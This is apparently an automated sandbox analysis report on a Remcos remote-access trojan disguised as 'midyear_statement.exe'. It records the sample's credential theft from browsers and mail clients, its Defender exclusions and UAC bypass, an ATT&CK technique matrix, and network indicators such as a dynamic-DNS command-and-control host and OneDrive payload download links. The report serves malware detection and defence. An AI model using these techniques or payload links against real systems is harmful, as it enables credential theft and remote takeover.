                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040A9150 GetLocalTime, 0_2_040A9150
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1234B60D GetComputerNameExW,GetUserNameW, 24_2_1234B60D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_00401108 GetTimeZoneInformation, 24_2_00401108
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040AB6D0 GetVersionExA, 0_2_040AB6D0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
                      Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 24_2_1233BA12
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 24_2_1233BB30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: \key3.db 24_2_1233BB30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: ESMTPPassword 28_2_004033F0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 28_2_00402DB3
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 28_2_00402DB3
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 8172, type: MEMORYSTR

                      Remote Access Functionality

                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
                      Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: cmd.exe 24_2_1233569A
                      Techniques per tactic (the count shown in the matrix is given in parentheses):

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
                      Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
                      Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
                      Execution: Native API (11); Command and Scripting Interpreter (13); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
                      Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (1); Windows Service (1); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                      Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (1); Process Injection (422); Registry Run Keys / Startup Folder (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                      Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (2); Timestomp (1); DLL Side-Loading (1); Bypass User Account Control (1); File Deletion (1); Masquerading (221); Valid Accounts (1); Virtualization/Sandbox Evasion (41); Access Token Manipulation (11); Process Injection (422)
                      Credential Access: OS Credential Dumping (2); Input Capture (211); Credentials in Registry (2); Credentials In Files (3); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
                      Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (3); System Information Discovery (59); Security Software Discovery (161); Virtualization/Sandbox Evasion (41); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1); Process Discovery; Permission Groups Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
                      Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture (211); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
                      Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
                      Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service
                      Behavior Graph ID: 1417015 | Sample: midyear_statement.exe | Startdate: 28/03/2024 | Architecture: WINDOWS | Score: 100
                      77 www.zuckdgreb.duckdns.org 2->77
                      79 web.fe.1drv.com 2->79
                      81 8 other IPs or domains 2->81
                      89 Snort IDS alert for network traffic 2->89
                      91 Found malware configuration 2->91
                      93 Malicious sample detected (through community Yara rule) 2->93
                      97 15 other signatures 2->97
                      12 midyear_statement.exe 1 6 2->12 started
                      17 Dhuirrkw.PIF 2->17 started
                      19 Dhuirrkw.PIF 2->19 started
                      95 Uses dynamic DNS services 77->95
                      87 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49699, 49700 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->87
                      69 C:\Windows \System32\netutils.dll, PE32+ 12->69 dropped
                      71 C:\Windows \System32\2506803.exe, PE32+ 12->71 dropped
                      73 C:\Users\Public\Libraries\wkrriuhD.pif, PE32 12->73 dropped
                      75 C:\Users\Public\Dhuirrkw.url, MS 12->75 dropped
                      121 Drops PE files with a suspicious file extension 12->121
                      123 Writes to foreign memory regions 12->123
                      125 Allocates memory in foreign processes 12->125
                      21 wkrriuhD.pif 3 16 12->21 started
                      26 cmd.exe 1 12->26 started
                      28 extrac32.exe 1 12->28 started
                      34 3 other processes 12->34
                      127 Multi AV Scanner detection for dropped file 17->127
                      30 wkrriuhD.pif 17->30 started
                      32 wkrriuhD.pif 19->32 started
                      83 www.zuckdgreb.duckdns.org 192.3.109.132, 4445, 49708, 49711 AS-COLOCROSSINGUS United States 21->83
                      85 geoplugin.net 178.237.33.50, 49712, 80 ATOM86-ASATOM86NL Netherlands 21->85
                      65 C:\ProgramData\remcos\logs.dat, data 21->65 dropped
                      109 Contains functionality to bypass UAC (CMSTPLUA) 21->109
                      111 Detected unpacking (changes PE section rights) 21->111
                      113 Detected Remcos RAT 21->113
                      119 10 other signatures 21->119
                      36 wkrriuhD.pif 21->36 started
                      39 wkrriuhD.pif 21->39 started
                      41 wkrriuhD.pif 2 21->41 started
                      115 Drops executables to the windows directory (C:\Windows) and starts them 26->115
                      43 2506803.exe 26->43 started
                      45 conhost.exe 26->45 started
                      67 C:\Users\Public\Libraries\Dhuirrkw.PIF, PE32 28->67 dropped
                      117 Drops PE files with a suspicious file extension 28->117
                      47 conhost.exe 34->47 started
                      49 conhost.exe 34->49 started
                      101 Tries to steal Instant Messenger accounts or passwords 36->101
                      103 Tries to steal Mail credentials (via file / registry access) 36->103
                      105 Tries to harvest and steal browser information (history, passwords, etc) 39->105
                      51 cmd.exe 1 43->51 started
                      99 Adds a directory exclusion to Windows Defender 51->99
                      54 cmd.exe 1 51->54 started
                      57 conhost.exe 51->57 started
                      107 Adds a directory exclusion to Windows Defender 54->107
                      59 powershell.exe 23 54->59 started
                      61 conhost.exe 54->61 started
                      63 WmiPrvSE.exe 59->63 started

                      Source | Detection | Scanner | Label
                      midyear_statement.exe | 26% | ReversingLabs | Win32.Trojan.Generic
                      midyear_statement.exe | 31% | Virustotal |
                      Source | Detection | Scanner | Label
                      C:\Users\Public\Libraries\Dhuirrkw.PIF | 26% | ReversingLabs | Win32.Trojan.Generic
                      C:\Users\Public\Libraries\wkrriuhD.pif | 3% | ReversingLabs |
                      C:\Windows \System32\2506803.exe | 0% | ReversingLabs |
                      C:\Windows \System32\netutils.dll | 75% | ReversingLabs | Win64.Trojan.Barys
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      http://www.imvu.comr | 0% | URL Reputation | safe
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
                      http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
                      https://aefd.nelreports.net/api/report?cat=bingth | 0% | URL Reputation | safe
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe
                      https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | URL Reputation | safe
                      https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
                      http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | URL Reputation | safe
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe
                      https://sectigo.com/CPS0 | 0% | URL Reputation | safe
                      https://aefd.nelreports.net/api/report?cat=wsb | 0% | URL Reputation | safe
                      http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
                      https://aefd.nelreports.net/api/report?cat=bingaot | 0% | URL Reputation | safe
                      https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe
                      http://ocsp.sectigo.com0C | 0% | URL Reputation | safe
                      http://www.ebuddy.com | 0% | URL Reputation | safe
                      https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9 | 0% | Avira URL Cloud | safe
                      https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb | 0% | Avira URL Cloud | safe
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
                      https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05 | 0% | Avira URL Cloud | safe
                      http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe
                      http://geoplugin.net/json.gpSystem32 | 0% | Avira URL Cloud | safe
                      xwww.zuckdgreb.duckdns.org | 0% | Avira URL Cloud | safe
                      https://onedrive.live.co | 0% | Avira URL Cloud | safe
                      https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58 | 0% | Avira URL Cloud | safe
                      http://www.imvu.comppData | 0% | Avira URL Cloud | safe
                      http://geoplugin.net/ | 0% | Avira URL Cloud | safe
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      dual-spov-0006.spov-msedge.net | 13.107.139.11 | true | false | | unknown
                      www.zuckdgreb.duckdns.org | 192.3.109.132 | true | true | | unknown
                      geoplugin.net | 178.237.33.50 | true | false | | unknown
                      onedrive.live.com | unknown | unknown | false | | high
                      abpoxw.sn.files.1drv.com | unknown | unknown | false | | high
                      aborlw.sn.files.1drv.com | unknown | unknown | false | | high
                      abqscw.sn.files.1drv.com | unknown | unknown | false | | high
                      Name | Malicious | Antivirus Detection | Reputation
                      https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk | false | | high
                      https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 | false | | high
                      xwww.zuckdgreb.duckdns.org | true | Avira URL Cloud: safe | unknown
                      http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
                      https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg | false | | high
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P | bhv348F.tmp.27.dr | false | | high
                      https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9 | bhv348F.tmp.27.dr | false | Avira URL Cloud: safe | unknown
                      http://www.imvu.comr | wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://ocsp.sectigo.com0 | midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://abpoxw.sn.files.1drv.com:443/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6c | Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000082F000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://abqscw.sn.files.1drv.com/y4mM5VAFczkoUgXiRkT2NbXnlBwvzcPuKz5AwJErjUwbkEuoWmzy8jSXGy266gPIcJH | Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1598043310.0000000000838000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://aefd.nelreports.net/api/report?cat=bingth | bhv348F.tmp.27.dr | false | URL Reputation: safe | unknown
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNN | midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp | false | | high
